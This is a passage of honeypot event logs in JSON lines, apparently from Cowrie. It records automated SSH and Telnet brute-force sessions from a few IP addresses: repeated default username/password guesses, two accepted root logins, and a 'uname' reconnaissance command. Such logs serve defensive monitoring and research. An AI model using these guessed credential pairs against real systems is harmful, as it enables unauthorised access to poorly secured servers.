a-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:02.632405Z","src_ip":"212.227.125.160","session":"27b82beb1e45"}
{"eventid":"cowrie.login.failed","username":"basit","password":"basit","message":"login attempt [basit/basit] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:02.993635Z","src_ip":"212.227.125.160","session":"27b82beb1e45"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:04.047658Z","src_ip":"212.227.125.160","session":"27b82beb1e45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39838,"dst_ip":"1.2.3.4","dst_port":22,"session":"005b083db5c3","protocol":"ssh","message":"New connection: 212.227.125.160:39838 (1.2.3.4:22) [session: 005b083db5c3]","sensor":"my-vps","timestamp":"2025-08-26T11:42:07.468345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:07.475055Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:07.519888Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Passw0rd","message":"login attempt [root/Passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:42:07.830752Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:42:07.957092Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:42:07.957977Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:08.010850Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:08.012132Z","src_ip":"212.227.125.160","session":"005b083db5c3"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34842,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffd00fea073e","protocol":"ssh","message":"New connection: 83.168.105.65:34842 (1.2.3.4:22) [session: ffd00fea073e]","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.162921Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.164072Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.203527Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.324018Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:42:10.472025Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.472686Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.512956Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:10.514053Z","src_ip":"83.168.105.65","session":"ffd00fea073e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47860,"dst_ip":"1.2.3.4","dst_port":23,"session":"789147cc5348","protocol":"telnet","message":"New connection: 212.227.125.160:47860 (1.2.3.4:23) [session: 789147cc5348]","sensor":"my-vps","timestamp":"2025-08-26T11:42:11.659216Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40614,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f99c447719b","protocol":"ssh","message":"New connection: 212.227.125.160:40614 (1.2.3.4:22) [session: 2f99c447719b]","sensor":"my-vps","timestamp":"2025-08-26T11:42:13.668146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:13.669094Z","src_ip":"212.227.125.160","session":"2f99c447719b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:13.718969Z","src_ip":"212.227.125.160","session":"2f99c447719b"}
{"eventid":"cowrie.login.failed","username":"factorio","password":"factorio","message":"login attempt [factorio/factorio] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:13.876423Z","src_ip":"212.227.125.160","session":"2f99c447719b"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:14.927802Z","src_ip":"212.227.125.160","session":"2f99c447719b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41382,"dst_ip":"1.2.3.4","dst_port":22,"session":"721b9c22cec8","protocol":"ssh","message":"New connection: 212.227.125.160:41382 (1.2.3.4:22) [session: 721b9c22cec8]","sensor":"my-vps","timestamp":"2025-08-26T11:42:18.942531Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:18.943508Z","src_ip":"212.227.125.160","session":"721b9c22cec8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:19.243304Z","src_ip":"212.227.125.160","session":"721b9c22cec8"}
{"eventid":"cowrie.login.failed","username":"linux","password":"linux","message":"login attempt [linux/linux] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:19.669224Z","src_ip":"212.227.125.160","session":"721b9c22cec8"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:20.722196Z","src_ip":"212.227.125.160","session":"721b9c22cec8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42154,"dst_ip":"1.2.3.4","dst_port":22,"session":"94d8dd7c40ba","protocol":"ssh","message":"New connection: 212.227.125.160:42154 (1.2.3.4:22) [session: 94d8dd7c40ba]","sensor":"my-vps","timestamp":"2025-08-26T11:42:24.917147Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:24.918102Z","src_ip":"212.227.125.160","session":"94d8dd7c40ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:24.981503Z","src_ip":"212.227.125.160","session":"94d8dd7c40ba"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36576,"dst_ip":"1.2.3.4","dst_port":22,"session":"e44a7e19d4a6","protocol":"ssh","message":"New connection: 83.168.105.65:36576 (1.2.3.4:22) [session: e44a7e19d4a6]","sensor":"my-vps","timestamp":"2025-08-26T11:42:25.128347Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:25.137558Z","src_ip":"83.168.105.65","session":"e44a7e19d4a6"}
{"eventid":"cowrie.login.failed","username":"teamspeak","password":"teamspeak","message":"login attempt [teamspeak/teamspeak] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:25.149476Z","src_ip":"212.227.125.160","session":"94d8dd7c40ba"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:25.173446Z","src_ip":"83.168.105.65","session":"e44a7e19d4a6"}
{"eventid":"cowrie.login.failed","username":"rancher","password":"rancher","message":"login attempt [rancher/rancher] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:25.344762Z","src_ip":"83.168.105.65","session":"e44a7e19d4a6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:26.202470Z","src_ip":"212.227.125.160","session":"94d8dd7c40ba"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:26.381851Z","src_ip":"83.168.105.65","session":"e44a7e19d4a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42924,"dst_ip":"1.2.3.4","dst_port":22,"session":"94938e328d16","protocol":"ssh","message":"New connection: 212.227.125.160:42924 (1.2.3.4:22) [session: 94938e328d16]","sensor":"my-vps","timestamp":"2025-08-26T11:42:30.490316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:30.492323Z","src_ip":"212.227.125.160","session":"94938e328d16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:30.542141Z","src_ip":"212.227.125.160","session":"94938e328d16"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:30.742207Z","src_ip":"212.227.125.160","session":"94938e328d16"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:31.798131Z","src_ip":"212.227.125.160","session":"94938e328d16"}
{"eventid":"cowrie.session.connect","src_ip":"49.51.141.176","src_port":56506,"dst_ip":"1.2.3.4","dst_port":23,"session":"e4ff8ec8fd94","protocol":"telnet","message":"New connection: 49.51.141.176:56506 (1.2.3.4:23) [session: e4ff8ec8fd94]","sensor":"my-vps","timestamp":"2025-08-26T11:42:33.152629Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43692,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce250f8c8554","protocol":"ssh","message":"New connection: 212.227.125.160:43692 (1.2.3.4:22) [session: ce250f8c8554]","sensor":"my-vps","timestamp":"2025-08-26T11:42:36.125602Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:36.126523Z","src_ip":"212.227.125.160","session":"ce250f8c8554"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:36.177144Z","src_ip":"212.227.125.160","session":"ce250f8c8554"}
{"eventid":"cowrie.login.failed","username":"hiddify-panel","password":"hiddify-panel","message":"login attempt [hiddify-panel/hiddify-panel] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:36.343072Z","src_ip":"212.227.125.160","session":"ce250f8c8554"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:37.403340Z","src_ip":"212.227.125.160","session":"ce250f8c8554"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49888,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba17557007a5","protocol":"ssh","message":"New connection: 212.227.125.160:49888 (1.2.3.4:22) [session: ba17557007a5]","sensor":"my-vps","timestamp":"2025-08-26T11:42:38.377777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:38.409450Z","src_ip":"212.227.125.160","session":"ba17557007a5"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","